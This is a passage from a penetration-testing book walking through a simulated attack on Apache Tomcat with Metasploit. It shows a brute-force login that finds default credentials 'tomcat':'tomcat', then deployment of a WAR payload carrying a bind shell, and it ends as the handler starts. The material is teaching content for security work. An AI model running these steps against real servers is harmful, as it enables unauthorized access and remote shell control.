Simulated Penetration Test
261
service.) After some more research on the operating version number of
the Apache Tomcat installation running on the target, the Tomcat manager
seemed the best route for compromising the system. If we can get through
Tomcat’s manager function, we can use the HTTP
PUT
method to deploy our
payload on the vulnerable system. We launch the attack as follows (with the
list of exploits and payloads snipped):
msf >
search apache
[*] Searching loaded modules for pattern 'apache'...
. . . SNIP . . .
msf auxiliary(tomcat_mgr_login) >
set RHOSTS 172.16.32.162
RHOSTS => 172.16.32.162
smsf auxiliary(tomcat_mgr_login) >
set THREADS 50
THREADS => 50
msf auxiliary(tomcat_mgr_login) >
set RPORT 8180
RPORT => 8180
msf auxiliary(tomcat_mgr_login) >
set VERBOSE false
VERBOSE => false
emsf auxiliary(tomcat_mgr_login) >
run
[+] http://172.16.32.162:8180/manager/html [Apache-Coyote/1.1] [Tomcat Application Manager]
successful login 'tomcat' : 'tomcat'
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(tomcat_mgr_login) >
Our brute force attack is successful, and it logs in with the username
tomcat
and password
tomcat
. But we don’t yet have a shell.
With our newly discovered credentials, we leverage Apache’s HTTP
PUT
functionality with the
multi/http/tomcat_mgr_deploy
exploit to place our pay-
load on the system using the valid username and password that we discovered
by brute-forcing the login.
auxiliary(tomcat_mgr_login) >
use multi/http/tomcat_mgr_deploy
msf exploit(tomcat_mgr_deploy) >
set password tomcat
password => tomcat
msf exploit(tomcat_mgr_deploy) >
set username tomcat
username => tomcat
msf exploit(tomcat_mgr_deploy) >
set RHOST 172.16.32.162
RHOST => 172.16.32.162
msf exploit(tomcat_mgr_deploy) >
set LPORT 9999
LPORT => 9999
Msf exploit(tomcat_mgr_deploy) >
set RPORT 8180
RPORT => 8180
msf exploit(tomcat_mgr_deploy) >
set payload linux/x86/shell_bind_tcp
payload => linux/x86/shell_bind_tcp
msf exploit(tomcat_mgr_deploy) >
exploit
[*] Using manually select target "Linux X86"
[*] Uploading 1669 bytes as FW36owipzcnHeUyIUaX.war ...
[*] Started bind handler